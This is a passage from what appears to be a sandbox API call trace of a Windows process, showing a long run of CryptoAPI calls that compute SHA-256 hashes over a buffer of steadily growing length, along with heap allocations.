	[0208.363] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b14c0
	[0208.363] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b14c0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b14c0, pdwDataLen=0x129364) returned 1
	[0208.363] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.363] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.363] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.364] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.364] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0208.364] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.364] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b14e8
	[0208.364] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b14e8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b14e8, pdwDataLen=0x129364) returned 1
	[0208.364] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.364] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.364] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.364] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.364] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0208.364] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.364] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1510
	[0208.364] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1510, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1510, pdwDataLen=0x129364) returned 1
	[0208.364] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.364] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.364] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.365] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.365] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0208.365] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.365] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1538
	[0208.365] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1538, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1538, pdwDataLen=0x129364) returned 1
	[0208.365] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.365] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.365] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.365] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.365] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0208.365] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.365] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1560
	[0208.365] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1560, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1560, pdwDataLen=0x129364) returned 1
	[0208.365] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.365] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.365] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.366] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.366] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0208.366] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.366] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1588
	[0208.366] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1588, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1588, pdwDataLen=0x129364) returned 1
	[0208.366] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.366] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.366] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.366] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.366] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0208.366] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.366] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b15b0
	[0208.366] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b15b0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b15b0, pdwDataLen=0x129364) returned 1
	[0208.366] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.366] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.366] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.367] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.367] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0208.367] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.367] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b15d8
	[0208.367] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b15d8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b15d8, pdwDataLen=0x129364) returned 1
	[0208.367] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.367] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.367] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.367] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.367] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0208.367] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.367] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1600
	[0208.367] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1600, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1600, pdwDataLen=0x129364) returned 1
	[0208.367] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.367] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.367] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.368] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.368] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0208.368] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.368] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1628
	[0208.368] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1628, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1628, pdwDataLen=0x129364) returned 1
	[0208.368] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.368] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.368] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.368] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.368] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0208.368] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.368] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1650
	[0208.368] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1650, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1650, pdwDataLen=0x129364) returned 1
	[0208.368] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.368] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.368] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.369] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.369] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0208.369] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.369] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1678
	[0208.369] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1678, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1678, pdwDataLen=0x129364) returned 1
	[0208.369] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.369] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.369] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.369] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.369] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0208.369] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.369] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b16a0
	[0208.369] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b16a0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b16a0, pdwDataLen=0x129364) returned 1
	[0208.369] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.369] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.369] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.370] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.370] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0208.370] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.370] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b16c8
	[0208.370] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b16c8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b16c8, pdwDataLen=0x129364) returned 1
	[0208.370] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.370] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.370] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.370] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.370] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0208.370] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.370] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b16f0
	[0208.370] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b16f0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b16f0, pdwDataLen=0x129364) returned 1
	[0208.370] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.371] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.371] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.371] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.371] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0208.371] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.371] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1718
	[0208.371] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1718, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1718, pdwDataLen=0x129364) returned 1
	[0208.371] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.371] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.371] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.371] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.371] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0208.371] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.371] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1740
	[0208.371] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1740, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1740, pdwDataLen=0x129364) returned 1
	[0208.371] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.371] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.372] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.372] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.372] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0208.372] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.372] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1768
	[0208.372] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1768, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1768, pdwDataLen=0x129364) returned 1
	[0208.372] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.372] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.372] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.372] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.372] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0208.372] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.372] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1790
	[0208.372] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1790, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1790, pdwDataLen=0x129364) returned 1
	[0208.372] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.372] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.372] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.373] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.373] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0208.373] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.373] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b17b8
	[0208.373] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b17b8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b17b8, pdwDataLen=0x129364) returned 1
	[0208.373] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.373] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.373] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.373] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.373] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0208.373] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.373] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b17e0
	[0208.373] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b17e0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b17e0, pdwDataLen=0x129364) returned 1
	[0208.373] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.373] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.373] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.374] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.374] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0208.374] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.374] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1808
	[0208.374] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1808, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1808, pdwDataLen=0x129364) returned 1
	[0208.374] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.374] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.374] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.374] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.374] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0208.374] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.374] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1830
	[0208.374] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1830, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1830, pdwDataLen=0x129364) returned 1
	[0208.374] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.374] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.374] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.375] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.375] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0208.375] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.375] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1858
	[0208.375] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1858, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1858, pdwDataLen=0x129364) returned 1
	[0208.375] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.375] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.375] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.375] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.375] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0208.375] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.375] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1880
	[0208.375] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1880, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1880, pdwDataLen=0x129364) returned 1
	[0208.375] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.375] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.375] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.376] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.376] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0208.376] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.376] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b18a8
	[0208.376] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b18a8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b18a8, pdwDataLen=0x129364) returned 1
	[0208.376] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.376] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
